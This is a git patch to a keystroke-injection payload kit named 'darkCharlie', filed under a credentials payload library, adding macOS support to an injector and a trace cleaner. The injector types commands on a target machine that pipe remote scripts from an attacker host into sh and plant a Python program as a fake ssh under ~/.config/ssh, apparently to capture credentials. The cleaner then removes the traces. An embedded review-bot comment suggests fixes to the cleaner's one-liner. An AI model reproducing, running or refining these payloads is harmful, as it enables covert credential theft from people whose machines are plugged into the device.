From 31468c0e63d8a313710e92efbc273cd23c5a017a Mon Sep 17 00:00:00 2001
From: Michael Weinstein
Date: Sun, 24 Sep 2017 02:11:45 -0700
Subject: [PATCH] mac attack Got mac attacks working now. SEDing in place on a mac seems like something that really makes the terminal unhappy. Did the same thing with a python one-shot command.
---
 .../credentials/darkCharlie/cleaner/payload.txt | 16 ++++++++++++----
 .../credentials/darkCharlie/injector/payload.txt | 16 +++++++++++-----
 2 files changed, 23 insertions(+), 9 deletions(-)
diff --git a/payloads/library/credentials/darkCharlie/cleaner/payload.txt b/payloads/library/credentials/darkCharlie/cleaner/payload.txt
index f78eca67..11dfa7c0 100644
--- a/payloads/library/credentials/darkCharlie/cleaner/payload.txt
+++ b/payloads/library/credentials/darkCharlie/cleaner/payload.txt
@@ -53,14 +53,22 @@ QUACK ENTER
 QUACK DELAY 500
 if [ "$mac" = true ]
 then
- QUACK STRING rm -rf \~/.config/ssh \&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bash_profile
+ QUACK STRING rm -rf \~/.config/ssh #\&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bash_profile #macs really seem to hate it when you sed in place, I think.
+ QUACK ENTER
+ QUACK STRING "python -c \"import os; home = os.environ['HOME']; file = open(home + '/.bash_profile','r'); dataIn = file.readlines(); file.close(); dataOut = [line for line in dataIn if not '~/.config/ssh' in line]; output = ''.join(dataOut); file = open(home + '/.bash_profile','w'); file.write(output); file.close()\""
 else
 QUACK STRING rm -rf \~/.config/ssh \&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bashrc
 fi
 QUACK ENTER
 QUACK DELAY 200
-QUACK STRING exit
-QUACK DELAY 200
-QUACK ENTER
+if [ "$mac" = true ]
+then
+ QUACK DELAY 2000
+ QUACK GUI w
+else
+ QUACK STRING exit
+ QUACK DELAY 200
+ QUACK ENTER
+fi
 LED SUCCESS
 #See you, space cowboy...
\ No newline at end of file
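Review bot: The Python one-liner added in the macOS branch of the cleaner drops every line of `~/.bash_profile` that contains the substring `~/.config/ssh`, which is broader than the `export PATH=~/.config/ssh:` pattern of the sed it replaces, so an unrelated line of the user's that mentions that path is deleted as well. The condition should match the same text the sed did, `if 'export PATH=~/.config/ssh:' not in line`. The one-liner also reopens the profile with `'w'`, which truncates it before the filtered content is written, so a failure between the two steps leaves the host's profile empty. Writing the result to a temporary file and renaming it over the original would avoid that.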
diff --git a/payloads/library/credentials/darkCharlie/injector/payload.txt b/payloads/library/credentials/darkCharlie/injector/payload.txt
index ec03ae26..5f87625a 100644
--- a/payloads/library/credentials/darkCharlie/injector/payload.txt
+++ b/payloads/library/credentials/darkCharlie/injector/payload.txt
@@ -62,13 +62,13 @@ then
 QUACK STRING curl "http://$HOST_IP/pre.sh" \| sh
 QUACK ENTER
 QUACK DELAY 200
- QUACK STRING curl "http://$HOST_IP/darkCharlie.py" \> ~/.config/ssh/ssh
+ QUACK STRING curl "http://$HOST_IP/darkCharlie.py" \> "~/.config/ssh/ssh"
 QUACK ENTER
 QUACK DELAY 200
 QUACK STRING curl "http://$HOST_IP/post.sh" \| sh
 QUACK ENTER
 QUACK DELAY 200
- QUACK STRING ~/.config/ssh/ssh --initializeScript
+ QUACK STRING python "~/.config/ssh/ssh" --initializeScript
 QUACK ENTER
 QUACK DELAY 200
 else
@@ -89,7 +89,13 @@ fi
 QUACK DELAY 200
 QUACK ENTER
 QUACK DELAY 200
-QUACK STRING exit
-QUACK DELAY 200
-QUACK ENTER
+if [ "$mac" = true ]
+then
+ QUACK DELAY 5000 #seems like macs need some extra time on this
+ QUACK GUI w
+else
+ QUACK STRING exit
+ QUACK DELAY 200
+ QUACK ENTER
+fi
 LED SUCCESS #The Dungeons and Dragons tattoo hath rolled a 20